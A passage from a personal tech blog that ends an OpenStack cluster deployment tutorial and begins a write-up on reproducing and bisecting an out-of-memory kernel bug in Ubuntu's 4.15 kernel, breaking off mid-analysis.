+-------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+
</code></pre></div></div>
<p>We can list networks with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack network list
+--------------------------------------+----------+--------------------------------------+
| ID | Name | Subnets |
+--------------------------------------+----------+--------------------------------------+
| 01ae2817-9697-430f-bdd4-6435d45dbbda | provider | 6e854541-fc59-4639-947b-a074efc05463 |
+--------------------------------------+----------+--------------------------------------+
</code></pre></div></div>
<h2 id="creating-some-flavours">Creating Some Flavours</h2>
<p>We need to tell OpenStack what sort of specifications we wish to assign to
instances, which are called flavours.</p>
<p>We will add a few of them:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack flavor create --id 0 --vcpus 1 --ram 64 --disk 1 m1.nano\
+----------------------------+---------+
| Field | Value |
+----------------------------+---------+
| OS-FLV-DISABLED:disabled | False |
| OS-FLV-EXT-DATA:ephemeral | 0 |
| disk | 1 |
| id | 0 |
| name | m1.nano |
| os-flavor-access:is_public | True |
| properties | |
| ram | 64 |
| rxtx_factor | 1.0 |
| swap | |
| vcpus | 1 |
+----------------------------+---------+
$ openstack flavor create --id 1 --vcpus 1 --ram 128 --disk 2 m1.small
$ openstack flavor create --id 2 --vcpus 1 --ram 256 --disk 3 m1.large
$ openstack flavor create --id 3 --vcpus 2 --ram 512 --disk 5 m1.xlarge
</code></pre></div></div>
<p>We can list all flavors with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack flavor list
+----+-----------+-----+------+-----------+-------+-----------+
| ID | Name | RAM | Disk | Ephemeral | VCPUs | Is Public |
+----+-----------+-----+------+-----------+-------+-----------+
| 0 | m1.nano | 64 | 1 | 0 | 1 | True |
| 1 | m1.small | 128 | 2 | 0 | 1 | True |
| 2 | m1.large | 256 | 3 | 0 | 1 | True |
| 3 | m1.xlarge | 512 | 5 | 0 | 2 | True |
+----+-----------+-----+------+-----------+-------+-----------+
</code></pre></div></div>
<h2 id="adding-a-ssh-keypair">Adding a SSH Keypair</h2>
<p>We need to seed the instance with a SSH keypair that we can use to connect with.</p>
<p>Let’s make a new SSH keypair for the demo user and add it to the keypair store.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ . demo-openrc
$ ssh-keygen -q -N ""
$ openstack keypair create --public-key ~/.ssh/id_rsa.pub mykey
+-------------+-------------------------------------------------+
| Field | Value |
+-------------+-------------------------------------------------+
| fingerprint | 72:d1:ee:80:59:f1:9a:03:96:d6:3f:31:32:53:20:9e |
| name | mykey |
| user_id | bf0cfff44d3c49cb92d10e5977a9decc |
+-------------+-------------------------------------------------+
</code></pre></div></div>
<p>We can check our list of keys with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack keypair list
+-------+-------------------------------------------------+
| Name | Fingerprint |
+-------+-------------------------------------------------+
| mykey | 72:d1:ee:80:59:f1:9a:03:96:d6:3f:31:32:53:20:9e |
+-------+-------------------------------------------------+
</code></pre></div></div>
<h2 id="creating-a-basic-security-group">Creating a Basic Security Group</h2>
<p>We need to create a basic security group for our instances so we can connect
to them. For now, we will allow SSH and ICMP through the firewall.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack security group rule create --proto icmp default
$ openstack security group rule create --proto icmp default
+-------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------+
| Field | Value |
+-------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------+
| created_at | 2020-02-06T03:52:15Z |
| description | |
| direction | ingress |
| ether_type | IPv4 |
| id | 4ec97531-46d7-4c26-bb38-6d122f077168 |
| location | cloud='', project.domain_id=, project.domain_name='Default', project.id='33569bb56110474db2d584b4a1936c6b', project.name='demo', region_name='', zone= |
| name | None |
| port_range_max | None |
| port_range_min | None |
| project_id | 33569bb56110474db2d584b4a1936c6b |
| protocol | icmp |
| remote_group_id | None |
| remote_ip_prefix | 0.0.0.0/0 |
| revision_number | 0 |
| security_group_id | ecea2521-11a6-4e2d-b979-6d5c59bd1580 |
| tags | [] |
| updated_at | 2020-02-06T03:52:15Z |
+-------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------+
$ openstack security group rule create --proto tcp --dst-port 22 default
+-------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------+
| Field | Value |
+-------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------+
| created_at | 2020-02-06T03:52:46Z |
| description | |
| direction | ingress |
| ether_type | IPv4 |
| id | 54332a65-d89e-49ac-9756-fd72ad2c18ee |
| location | cloud='', project.domain_id=, project.domain_name='Default', project.id='33569bb56110474db2d584b4a1936c6b', project.name='demo', region_name='', zone= |
| name | None |
| port_range_max | 22 |
| port_range_min | 22 |
| project_id | 33569bb56110474db2d584b4a1936c6b |
| protocol | tcp |
| remote_group_id | None |
| remote_ip_prefix | 0.0.0.0/0 |
| revision_number | 0 |
| security_group_id | ecea2521-11a6-4e2d-b979-6d5c59bd1580 |
| tags | [] |
| updated_at | 2020-02-06T03:52:46Z |
+-------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------+
</code></pre></div></div>
<p>We can list security groups with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack security group list
+--------------------------------------+---------+------------------------+----------------------------------+------+
| ID | Name | Description | Project | Tags |
+--------------------------------------+---------+------------------------+----------------------------------+------+
| ecea2521-11a6-4e2d-b979-6d5c59bd1580 | default | Default security group | 33569bb56110474db2d584b4a1936c6b | [] |
+--------------------------------------+---------+------------------------+----------------------------------+------+
</code></pre></div></div>
<h1 id="launching-an-instance">Launching an Instance</h1>
<p>Everything should be set now. Go ahead and launch your first instance with the
cirros image we previous uploaded into Glance.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack server create --flavor m1.nano --image cirros --nic net-id=01ae2817-9697-430f-bdd4-6435d45dbbda \
--security-group default --key-name mykey myfirstinstance
+-----------------------------+-----------------------------------------------+
| Field | Value |
+-----------------------------+-----------------------------------------------+
| OS-DCF:diskConfig | MANUAL |
| OS-EXT-AZ:availability_zone | |
| OS-EXT-STS:power_state | NOSTATE |
| OS-EXT-STS:task_state | scheduling |
| OS-EXT-STS:vm_state | building |
| OS-SRV-USG:launched_at | None |
| OS-SRV-USG:terminated_at | None |
| accessIPv4 | |
| accessIPv6 | |
| addresses | |
| adminPass | Q9XtMEM56LnW |
| config_drive | |
| created | 2020-02-12T04:06:59Z |
| flavor | m1.nano (0) |
| hostId | |
| id | 8b16810d-1c9c-4094-b794-f2929388623c |
| image | cirros (5ad293f2-1d07-44ae-8a23-19d619885a3b) |
| key_name | mykey |
| name | myfirstinstance |
| progress | 0 |
| project_id | 33569bb56110474db2d584b4a1936c6b |
| properties | |
| security_groups | name='ecea2521-11a6-4e2d-b979-6d5c59bd1580' |
| status | BUILD |
| updated | 2020-02-12T04:06:59Z |
| user_id | bf0cfff44d3c49cb92d10e5977a9decc |
| volumes_attached | |
+-----------------------------+-----------------------------------------------+
</code></pre></div></div>
<p>That has begun the process to provision a new virtual machine on the compute
node with the m1.nano flavor.</p>
<p>We can check the status of our instance with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ openstack server list
+--------------------------------------+-----------------+--------+------------------------+--------+---------+
| ID | Name | Status | Networks | Image | Flavor |
+--------------------------------------+-----------------+--------+------------------------+--------+---------+
| 8b16810d-1c9c-4094-b794-f2929388623c | myfirstinstance | ACTIVE | provider=203.0.113.103 | cirros | m1.nano |
+--------------------------------------+-----------------+--------+------------------------+--------+---------+
</code></pre></div></div>
<p>We can also check the status from Horizon:</p>
<p><img src="/assets/images/2020_008.png" alt="status" /></p>
<p>From there, we can go ahead and SSH into it, with the “cirros” user:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ssh cirros@203.0.113.103
The authenticity of host '203.0.113.103 (203.0.113.103)' can't be established.
ECDSA key fingerprint is SHA256:cs620jJtz28Xum30RluDJ4cLjQ7WzB89xhAxoWcODSk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '203.0.113.103' (ECDSA) to the list of known hosts.
$ uname -rv
4.4.0-28-generic #47-Ubuntu SMP Fri Jun 24 10:09:13 UTC 2016
$ hostname
myfirstinstance
$ free -m
total used free shared buffers
Mem: 46 34 11 0 3
-/+ buffers: 31 15
Swap: 0 0 0
</code></pre></div></div>
<p>You know, if you made it this far, and have a working OpenStack cluster, you
deserve a medal! Really, excellent work.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ figlet Well Done!
__ __ _ _ ____ _
\ \ / /__| | | | _ \ ___ _ __ ___| |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ |
\ V V / __/ | | | |_| | (_) | | | | __/_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_)
</code></pre></div></div>
<h1 id="useful-things-we-can-do-from-horizon">Useful Things We Can Do From Horizon</h1>
<p>Horizon aims to implement most tasks users want to do on a regular basis,
which is primarily to create and manage their virtual machines they wish to
provision. Horizon can do some neat things to help users with that like:</p>
<p>Horizon can display everything you want to know about your instance:</p>
<p><img src="/assets/images/2020_009.png" alt="information" /></p>
<p>Horizon can show you network interfaces on your instance:</p>
<p><img src="/assets/images/2020_010.png" alt="network" /></p>
<p>Horizon can give you a listing of the instances syslog:</p>
<p><img src="/assets/images/2020_011.png" alt="log" /></p>
<p>Horizon can even give you a web based VNC-like remote terminal to your instance:</p>
<p><img src="/assets/images/2020_012.png" alt="novnc" /></p>
<p>Of course, Horizon can also help you launch instances:</p>
<p><img src="/assets/images/2020_013.png" alt="launch" /></p>
<h1 id="conclusion">Conclusion</h1>
<p>Well, I have to say, this blog post has been an absolute journey. OpenStack is
by far the most complicated software package that I have installed and
configured, in both the time needed and sheer amount of moving parts aspects.</p>
<p>I started this post with only a vague idea of what OpenStack is and what it does,
but now, after installing each of the primary services, configuring them, and
seeing how they come together, I now understand the purpose of each service and
sub-service, as well as a good idea of how they are implemented and the design
decisions made.</p>
<p>We haven’t touched too much on usage and debugging OpenStack too much, since this
blog post is much too long already, but that will be coming in the future.</p>
<p>I hope you enjoyed the read, and if you have been following along, I hope you
have a working cluster.</p>
<p>As always, if you have any questions, feel free to <a href="/about">contact me</a>.</p>
<p>Matthew Ruffell</p>Matthew RuffellThe next article in my series of learning about cloud computing is tackling one of the larger and more widely used cloud software packages - OpenStack. OpenStack is a service which lets you provision and manage virtual machines across a pool of hardware which may have differing specifications and vendors. Today, we will be deploying a small five node OpenStack cluster in Ubuntu 19.10 Eoan Ermine, so follow along, and let’s get this cluster running. We will cover what OpenStack is, the services it is comprised of, how to deploy it, and using our cluster to provision some virtual machines. Let’s get started.Analysis of an Out Of Memory Kernel Bug in the Ubuntu 4.15 Kernel2019-12-13T00:00:00+00:002019-12-13T00:00:00+00:00https://ruffell.nz/programming/writeups/2019/12/13/analysis-of-out-of-memory-kernel-bug-in-ubuntu-4-15-kernel<p>As mentioned previously, I will write about particularly interesting cases I
have worked from start to completion from time to time on this blog.</p>
<p>This is another of those cases. Today, we are going to look at a case where
creating a seemingly innocent RAID array triggers a kernel bug which causes the
system to allocate all of its memory and subsequently crash.</p>
<p><img src="/assets/images/2019_283.png" alt="hero" /></p>
<p>Let’s start digging into this and get this fixed.</p>
<!--more-->
<h1 id="reproducing-the-issue">Reproducing the Issue</h1>
<p>Before we start hunting for kernel commits to see if we can fix the problem, it
is always a good idea to reproduce the issue if possible and see what we can
learn. This gives us a fresh set of logs on small isolated test systems, so we
can be sure the command we previously ran caused the issue and not something
else that may be running on a customer system.</p>
<p>Reading the case, the complaint is that when trying to format a RAID array of
several disks with the xfs file system, the system hangs for a short time, ssh
sessions disconnect, and if you reconnect, dmesg shows that the Out Of Memory
(OOM) reaper has come out and killed most processes, including the SSH daemon.</p>
<p>The case mentions that the underlying disks are NVMe devices, so we will try and
reproduce using NVMe disks.</p>
<p>Again, my system does not have any NVMe devices, let alone 8 of them, so we will
probably use a cloud computing service for a test system. Google Cloud Platform
is probably the best for this case, since it lets you easily add any number of
NVMe based scratch disks to your instance.</p>
<p>Open up the dashboard, and create a new instance. Select Ubuntu 18.04 as the
operating system, and leave the main disk as 10gb. Head down to the “Add
additional disks” section, and from the dropdown, select “Local SSD Scratch disk”
and make sure they are NVMe. In the number of disks, drag the slider to 8.</p>
<p><img src="/assets/images/2019_284.png" alt="gcp" /></p>
<p>Go ahead and make the instance. It might be a little pricey, but we aren’t going
to be using this instance for too long, so make sure to terminate it as soon
as you are finished with it.</p>
<p>SSH into the instance. To reproduce, we need to be running the 4.15.0-58-generic
kernel, so we can install that like so:</p>
<ol>
<li><code class="language-plaintext highlighter-rouge">sudo apt update</code></li>
<li><code class="language-plaintext highlighter-rouge">sudo apt install linux-image-4.15.0-58-generic linux-modules-4.15.0-58-generic linux-modules-extra-4.15.0-58-generic linux-headers-4.15.0-58 linux-headers-4.15.0-58-generic</code></li>
<li><code class="language-plaintext highlighter-rouge">sudo nano /etc/default/grub</code>
<ul>
<li>Change <code class="language-plaintext highlighter-rouge">GRUB_DEFAULT=0</code> to <code class="language-plaintext highlighter-rouge">GRUB_DEFAULT="1>2"</code></li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">sudo nano /etc/default/grub.d/50-cloudimg-settings.cfg</code>
<ul>
<li>Comment out <code class="language-plaintext highlighter-rouge">GRUB_DEFAULT=0</code> with a <code class="language-plaintext highlighter-rouge">#</code>.</li>
</ul>
</li>
<li><code class="language-plaintext highlighter-rouge">sudo update-grub</code></li>
<li><code class="language-plaintext highlighter-rouge">sudo reboot</code></li>
</ol>
<p>This installs the 4.15.0-58 kernel and changes the grub config to boot into it
by default, since we can’t open the grub menu on cloud instances.</p>
<p>Once the instance comes back up again, check <code class="language-plaintext highlighter-rouge">uname -rv</code> to ensure we are in
the correct kernel:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ uname -rv
4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019
</code></pre></div></div>
<p>Good. Lets see what devices our NVMe disks are:</p>
<p><img src="/assets/images/2019_285.png" alt="lsblk" /></p>
<p>Seem to be based on <code class="language-plaintext highlighter-rouge">nvme0nX</code>.</p>
<p>Time to reproduce. Create a RAID array with:</p>
<ol>
<li><code class="language-plaintext highlighter-rouge">sudo su</code></li>
<li><code class="language-plaintext highlighter-rouge">mdadm --create /dev/md0 --level=0 --raid-devices=8 /dev/nvme0n1 /dev/nvme0n2 /dev/nvme0n3 /dev/nvme0n4 /dev/nvme0n5 /dev/nvme0n6 /dev/nvme0n7 /dev/nvme0n8</code></li>
<li><code class="language-plaintext highlighter-rouge">mkfs.xfs -f /dev/md0</code></li>
</ol>
<p>Nothing will happen for a few seconds, and then the SSH session will disconnect:</p>
<p><img src="/assets/images/2019_286.png" alt="repro" /></p>
<p>Pretty strange behaviour really. Reconnect, and examine dmesg:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CPU: 0 PID: 776 Comm: systemd-network Not tainted 4.15.0-58-generic #64-Ubuntu
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011
Call Trace:
dump_stack+0x63/0x8b
dump_header+0x71/0x285
oom_kill_process+0x220/0x440
out_of_memory+0x2d1/0x4f0
__alloc_pages_slowpath+0xa53/0xe00
? alloc_pages_current+0x6a/0xe0
__alloc_pages_nodemask+0x29a/0x2c0
alloc_pages_current+0x6a/0xe0
__page_cache_alloc+0x81/0xa0
filemap_fault+0x378/0x6f0
? filemap_map_pages+0x181/0x390
ext4_filemap_fault+0x31/0x44
__do_fault+0x24/0xe5
__handle_mm_fault+0xdef/0x1290
handle_mm_fault+0xb1/0x1f0
__do_page_fault+0x281/0x4b0
do_page_fault+0x2e/0xe0
? page_fault+0x2f/0x50
page_fault+0x45/0x50
</code></pre></div></div>
<p>We see a fairly standard call trace saying the system hit a page fault, and when
it tried to allocate a new page with <code class="language-plaintext highlighter-rouge">__page_cache_alloc()</code>, that failed to,
taking the slowpath, which realised the system was out of memory, and invoked the
OOM reaper.</p>
<p>Reading down, we find a printout of all the memory currently located in the SLAB.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Unreclaimable slab info:
Name Used Total
RAWv6 15KB 15KB
UDPv6 15KB 15KB
TCPv6 31KB 31KB
mqueue_inode_cache 7KB 7KB
fuse_request 3KB 3KB
RAW 7KB 7KB
tw_sock_TCP 3KB 3KB
request_sock_TCP 3KB 3KB
TCP 16KB 16KB
hugetlbfs_inode_cache 7KB 7KB
eventpoll_pwq 7KB 7KB
eventpoll_epi 8KB 8KB
request_queue 118KB 311KB
dmaengine-unmap-256 30KB 30KB
dmaengine-unmap-128 15KB 15KB
file_lock_cache 3KB 3KB
net_namespace 27KB 27KB
shmem_inode_cache 476KB 550KB
taskstats 7KB 7KB
sigqueue 3KB 3KB
kernfs_node_cache 6726KB 6968KB
mnt_cache 146KB 146KB
filp 92KB 152KB
lsm_file_cache 35KB 35KB
nsproxy 3KB 3KB
vm_area_struct 74KB 108KB
mm_struct 61KB 61KB
files_cache 22KB 22KB
signal_cache 88KB 88KB
sighand_cache 185KB 185KB
task_struct 517KB 540KB
cred_jar 47KB 47KB
anon_vma 106KB 106KB
pid 114KB 140KB
Acpi-Operand 74KB 74KB
Acpi-ParseExt 7KB 7KB
Acpi-State 11KB 11KB
Acpi-Namespace 15KB 15KB
numa_policy 3KB 3KB
trace_event_file 122KB 122KB
ftrace_event_field 167KB 167KB
task_group 39KB 39KB
kmalloc-8192 1344KB 1344KB
kmalloc-4096 856KB 960KB
kmalloc-2048 1346KB 1424KB
kmalloc-1024 1042KB 1064KB
kmalloc-512 466KB 480KB
kmalloc-256 3499256KB 3499256KB
kmalloc-192 311KB 311KB
kmalloc-128 1156KB 1156KB
kmalloc-96 155KB 216KB
kmalloc-64 367KB 432KB
kmalloc-32 336KB 336KB
kmalloc-16 60KB 60KB
kmalloc-8 32KB 32KB
kmem_cache_node 80KB 80KB
kmem_cache 396KB 453KB
</code></pre></div></div>
<p>Everything looks pretty normal, apart from the <code class="language-plaintext highlighter-rouge">kmalloc-256</code> slab. If you are
unfamiliar with how kernel memory allocation works in Linux, maybe take a moment
and read the blog post I wrote it on it here:</p>
<p><a href="https://ruffell.nz/programming/writeups/2019/02/15/looking-at-kmalloc-and-the-slub-memory-allocator.html">Looking at kmalloc() and the SLUB Memory Allocator</a></p>
<p>Back to the <code class="language-plaintext highlighter-rouge">kmalloc-256</code> slab. Looking at it, there is 3499256KB used!
Converting 3499256KB to gigabytes gives us 3.49GB. Our little cloud instance
only has 3.75GB of ram by default, so it seems something has caused all the
system memory to get caught up in the <code class="language-plaintext highlighter-rouge">kmalloc-256</code> slab.</p>
<h1 id="finding-a-workaround">Finding a Workaround</h1>
<p>The next thing to do is try some other kernels to see if we can reproduce.</p>
<p>I tried the Bionic HWE kernel, based on the 5.0 kernel that Ubuntu 19.04 Disco
Dingo uses. I wasn’t able to reproduce.</p>
<p>The next thing I tried was a previous Bionic kernel. The previous released kernel
is 4.15.0-55-generic, and I wasn’t able to reproduce either.</p>
<p>Both are good news. Anyone affected by this bug can use the previous kernel or
the HWE kernel while this gets fixed. It also tells us that this was introduced
somewhere between 4.15.0-56 to 4.15.0-58.</p>
<h1 id="searching-for-the-root-cause">Searching for the Root Cause</h1>
<p>Time to dive into the commits for the kernel to see if we can determine anything
from a quick look.</p>
<p>We know the problem between 4.15.0-56 to 4.15.0-58, so let’s have a look at those
releases.</p>
<p>If we look at the git tree located at:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git://kernel.ubuntu.com/ubuntu/ubuntu-bionic.git
</code></pre></div></div>
<p>There are four tags we are interested in:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ git tag
...
Ubuntu-4.15.0-55.60
Ubuntu-4.15.0-56.62
Ubuntu-4.15.0-57.63
Ubuntu-4.15.0-58.64
...
</code></pre></div></div>
<p>We can use <code class="language-plaintext highlighter-rouge">git log</code> to see what is in each tag:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git log --oneline Ubuntu-4.15.0-57.63..Ubuntu-4.15.0-58.64
9bff5f095923 (tag: Ubuntu-4.15.0-58.64) UBUNTU: Ubuntu-4.15.0-58.64
fca95d49540c Revert "new primitive: discard_new_inode()"
90c14a74ff26 Revert "ovl: set I_CREATING on inode being created"
544300b72249 UBUNTU: Start new release
</code></pre></div></div>
<p>Seems some small regressions were reverted in 4.15.0-58, and is otherwise a small
release likely made late in the SRU cycle.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ git log --oneline Ubuntu-4.15.0-56.62..Ubuntu-4.15.0-57.63
7c905029d1e1 (tag: Ubuntu-4.15.0-57.63) UBUNTU: Ubuntu-4.15.0-57.63
3536b6c0146c x86/speculation/swapgs: Exclude ATOMs from speculation through SWAPGS
fb8801640c8d x86/entry/64: Use JMP instead of JMPQ
1592edcea558 x86/speculation: Enable Spectre v1 swapgs mitigations
2efd2444a88e x86/speculation: Prepare entry code for Spectre v1 swapgs mitigations
cdb3893f2b04 x86/cpufeatures: Combine word 11 and 12 into a new scattered features word
a015c7c9e9f7 x86/cpufeatures: Carve out CQM features retrieval
ebd969e74a54 UBUNTU: update dkms package versions
29331dc18182 UBUNTU: Start new release
</code></pre></div></div>
<p>4.15.0-57 seems pretty quiet as well. Seems to be fixes for CVE-2019-1125, also
not unusual to happen late in a SRU cycle.</p>
<p>The flaw is likely to fall into 4.15.0-56 then:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ git log --oneline Ubuntu-4.15.0-55.60..Ubuntu-4.15.0-56.62 | wc -l
2787
</code></pre></div></div>
<p>2787 commits are present in 4.15.0-56! That is one big release, and we aren’t
going to be able to read all of those commits.</p>
<p>I had a good read through all the subjects, and examined many commits, but
nothing immediately jumped out as something that can cause the kernel to
runaway, allocating memory until it cannot anymore, that is caused by the block,
or filesystem, or maybe NVMe subsystems.</p>
<p>Since we are limited on time, and we know a definitive start and end points to
where the behaviour is introduced, and can easily reproduce the issue ourselves,
this case is a good candidate for a <code class="language-plaintext highlighter-rouge">git bisect</code>.</p>
<p><code class="language-plaintext highlighter-rouge">git bisect</code> is a tool which uses a basic binary search algorithm to hone in on
a commit which breaks things. At each iteration, the midway point is selected
between good and bad commits. This lets us get through all 2787 commits in as
little as 12 or so tests.</p>
<p>We need to tell git bisect what tag is good and what tag is bad. We can do that
like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ git bisect start Ubuntu-4.15.0-56.62 Ubuntu-4.15.0-55.60
Bisecting: 1393 revisions left to test after this (roughly 11 steps)
[9cac6a2d2438924773cef5b30eab8f72d5a5ea3f] selftests/x86: Add clock_gettime() tests to test_vdso
</code></pre></div></div>
<p>We will look between 4.15.0-55, which was good, and 4.15.0-56, which was bad.</p>
<p>From here, we can go and build a test kernel, create a new cloud instance with
lots of NVMe disks and try and reproduce. After doing all this, I can say that
commit 9cac6a2d2438924773cef5b30eab8f72d5a5ea3f, which is halfway between
4.15.0-55 and 4.15.0-56, is good, and the problem could not be reproduced.</p>
<p>So I tell git that.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ git bisect good
Bisecting: 696 revisions left to test after this (roughly 10 steps)
[621db8f68ea5dc1389cc29de188c62b708520115] vhost/scsi: truncate T10 PI iov_iter to prot_bytes
</code></pre></div></div>
<p>It gives us a new commit to test. This is halfway between 4.15.0-55 and
621db8f68ea5dc1389cc29de188c62b708520115, or on a bigger scale, a quarter of the
way between 4.15.0-55 and 4.15.0-56. Nice. Again, build a test kernel, upload
to a new cloud instance and try reproduce. This time, I managed to see the OOM
problem, and the system crashed.</p>
<p>So I tell git that.</p>
<p>This keeps going until we hone in on the commit which causes the problem:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ git bisect bad
Bisecting: 348 revisions left to test after this (roughly 9 steps)
[caed9931cfca4728ede493925804551759a17412] cdc-acm: fix race between reset and control messaging
$ git bisect good
Bisecting: 174 revisions left to test after this (roughly 8 steps)
[309d43a67a3a24ebf5ef72f3dcdc00dfcdd8c3fb] KVM: arm64: Fix caching of host MDCR_EL2 value
$ git bisect good
Bisecting: 87 revisions left to test after this (roughly 7 steps)
[d06521337ebd71f654b606612714c48e34aacd35] bcache: Populate writeback_rate_minimum attribute
$ git bisect bad
Bisecting: 43 revisions left to test after this (roughly 6 steps)
[97f76c511e9a41bc19282a921e53545ce08e168c] btrfs: Ensure btrfs_trim_fs can trim the whole filesystem
$ git bisect good
Bisecting: 21 revisions left to test after this (roughly 5 steps)
[edf57bb077f89c6e95003bdacc9478f52a37fd46] MD: fix invalid stored role for a disk - try2
$ git bisect good
Bisecting: 10 revisions left to test after this (roughly 4 steps)
[b6b0136869f05706228bb13511db7798af2c232b] mailbox: PCC: handle parse error
$ git bisect bad
Bisecting: 5 revisions left to test after this (roughly 3 steps)
[b515257f186e532e0668f7deabcb04b5d27505cf] block: make sure discard bio is aligned with logical block size
$ git bisect bad
Bisecting: 2 revisions left to test after this (roughly 1 step)
[da64877868c5ea90f741a31261205dae67139f59] mtd: spi-nor: fsl-quadspi: Don't let -EINVAL on the bus
$ git bisect good
Bisecting: 0 revisions left to test after this (roughly 1 step)
[3c2f83d8bcbedeb89efcaf55ae64a99dce9d7e34] block: don't deal with discard limit in blkdev_issue_discard()
$ git bisect bad
Bisecting: 0 revisions left to test after this (roughly 0 steps)
[894c8a9ad1d7e551bfbce5422c68816bc69146a2] bcache: correct dirty data statistics
$ git bisect good
3c2f83d8bcbedeb89efcaf55ae64a99dce9d7e34 is the first bad commit
commit 3c2f83d8bcbedeb89efcaf55ae64a99dce9d7e34
Author: Ming Lei <ming.lei@redhat.com>
Date: Fri Oct 12 15:53:10 2018 +0800
block: don't deal with discard limit in blkdev_issue_discard()
BugLink: https://bugs.launchpad.net/bugs/1836802
commit 744889b7cbb56a64f957e65ade7cb65fe3f35714 upstream.
blk_queue_split() does respect this limit via bio splitting, so no
need to do that in blkdev_issue_discard(), then we can align to
normal bio submit(bio_add_page() & submit_bio()).
More importantly, this patch fixes one issue introduced in a22c4d7e34402cc
("block: re-add discard_granularity and alignment checks"), in which
zero discard bio may be generated in case of zero alignment.
Fixes: a22c4d7e34402ccdf3 ("block: re-add discard_granularity and alignment checks")
:040000 040000 7483c1408acdee78933db770716b9b18f16d7644 b59d8fa70f2b07fb0a08b42aaab78daa8af57501 M block
</code></pre></div></div>
<h1 id="root-cause-analysis">Root Cause Analysis</h1>
<p>The problem is caused by the below two commits:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>commit: 744889b7cbb56a64f957e65ade7cb65fe3f35714
ubuntu-bionic: 3c2f83d8bcbedeb89efcaf55ae64a99dce9d7e34
Author: Ming Lei <ming.lei@redhat.com>
Date: Fri Oct 12 15:53:10 2018 +0800
Subject: block: don't deal with discard limit in blkdev_issue_discard()
BugLink: https://bugs.launchpad.net/bugs/1836802
commit: 1adfc5e4136f5967d591c399aff95b3b035f16b7
ubuntu-bionic: b515257f186e532e0668f7deabcb04b5d27505cf
Author: Ming Lei <ming.lei@redhat.com>
Date: Mon Oct 29 20:57:17 2018 +0800
Subject: block: make sure discard bio is aligned with logical block size
BugLink: https://bugs.launchpad.net/bugs/1836802
</code></pre></div></div>
<p>You can read them by looking at the text files below:</p>
<ul>
<li><a href="/assets/bin/block_dont_deal_with.txt">block: don’t deal with discard limit in blkdev_issue_discard()</a></li>
<li><a href="/assets/bin/block_make_sure_discard.txt">block: make sure discard bio is aligned with logical block size</a></li>
</ul>
<p>Now, the fault was triggered in two stages. Firstly, in “block: don’t deal with
discard limit in blkdev_issue_discard()” a while loop was changed such that
there is a possibility of an infinite loop if <code class="language-plaintext highlighter-rouge">__blkdev_issue_discard()</code> is called
with <code class="language-plaintext highlighter-rouge">nr_sects</code> > 0 and <code class="language-plaintext highlighter-rouge">req_sects</code> somehow becomes 0:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">__blkdev_issue_discard</span><span class="p">(...,</span> <span class="n">sector_t</span> <span class="n">nr_sects</span><span class="p">,</span> <span class="p">...)</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="k">while</span> <span class="p">(</span><span class="n">nr_sects</span><span class="p">)</span> <span class="p">{</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">req_sects</span> <span class="o">=</span> <span class="n">nr_sects</span><span class="p">;</span>
<span class="n">sector_t</span> <span class="n">end_sect</span><span class="p">;</span>
<span class="n">end_sect</span> <span class="o">=</span> <span class="n">sector</span> <span class="o">+</span> <span class="n">req_sects</span><span class="p">;</span>
<span class="p">...</span>
<span class="n">nr_sects</span> <span class="o">-=</span> <span class="n">req_sects</span><span class="p">;</span>
<span class="n">sector</span> <span class="o">=</span> <span class="n">end_sect</span><span class="p">;</span>
<span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
<p>if <code class="language-plaintext highlighter-rouge">req_sects</code> is 0, then <code class="language-plaintext highlighter-rouge">end_sect</code> is always equal to <code class="language-plaintext highlighter-rouge">sector</code>, and the most
